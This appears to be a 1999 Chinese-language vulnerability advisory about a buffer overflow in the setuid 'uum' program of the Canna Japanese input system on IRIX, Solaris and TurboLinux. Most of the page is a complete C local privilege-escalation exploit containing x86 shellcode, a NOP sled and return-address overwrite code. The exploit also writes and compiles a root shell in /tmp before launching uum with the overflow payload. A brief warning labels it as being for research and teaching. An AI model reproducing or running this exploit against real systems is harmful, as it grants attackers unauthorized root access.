Canna子系统 'uum' 缓存溢出
发布日期:1999-11-02
更新日期:1999-11-02
受影响系统:SGI IRIX 6.5
SGI IRIX 6.4
SGI IRIX 6.3
SGI IRIX 6.2
SGI IRIX 5.3
Sun Solaris 7.0_x86
Sun Solaris 7.0
Sun Solaris 2.6_x86
Sun Solaris 2.6
TurboLinux Turbo Linux 4.2
描述:
Canna是一个免费的日文输入系统,它提供统一的用户输入界面,Canna支持Nemacs(Mule),kinput2和canuum。这些工具提供单一的用户定制化文件,罗马字母到日文假名的转化规则和字典,使用同样的日文输入方式。
Canna在进行日文假名到日本汉字的转化时采用了客户-服务器模式由此支持其自动转化。
在某些Unix平台上的Canna子系统‘uum’程序中存在缓存溢出问题。其原因是没有检查用户在使用“-D”选项时的使用的数据。
因为此程序为suid程序,因此此漏洞可以造成root级的安全问题。
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
/*=============================================================================
/usr/bin/uum Exploit for Linux
The Shadow Penguin Security (http://shadowpenguin.backsection.net)
Written by
UNYUN (shadowpenguin@backsection.net)
=============================================================================
*/
#include <stdlib.h>
#include <stdio.h>
#define RET_ADR 84
#define EXP_ADR 204
#define MAXBUF 300
#define JMP_OFS 0x484
#define NOP 0x90
#define SHELL "/tmp/pp"
#define COMPILER "gcc"
char exec[60]=
"\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
"\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
"\x80\xe8\xdc\xff\xff\xff";
char xx[MAXBUF+1];
unsigned int i,ip,sp;
FILE *fp;
unsigned long get_sp(void)
{
__asm__("movl %esp, %eax");
}
main()
{
strcat(exec,SHELL);
sprintf(xx,"%s.c",SHELL);
if ((fp=fopen(xx,"w"))==NULL){
printf("Can not write to %s\n",xx);
exit(1);
}
fprintf(fp,"main(){setuid(0);setgid(0);system(\"/bin/sh\");}");
fclose(fp);
sprintf(xx,"%s %s.c -o %s",COMPILER,SHELL,SHELL);
system(xx);
sp=get_sp();
memset(xx,NOP,MAXBUF);
ip=sp-JMP_OFS;
printf("Jumping address = %x\n",ip);
xx[RET_ADR ]=ip&0xff;
xx[RET_ADR+1]=(ip>>8)&0xff;
xx[RET_ADR+2]=(ip>>16)&0xff;
xx[RET_ADR+3]=(ip>>24)&0xff;
strncpy(xx+EXP_ADR,exec,strlen(exec));
xx[MAXBUF]=0;
execl("/usr/bin/uum","uum","-D",xx,(char *) 0);
}
建议:
暂无
浏览次数:7697
严重程度:0(网友投票)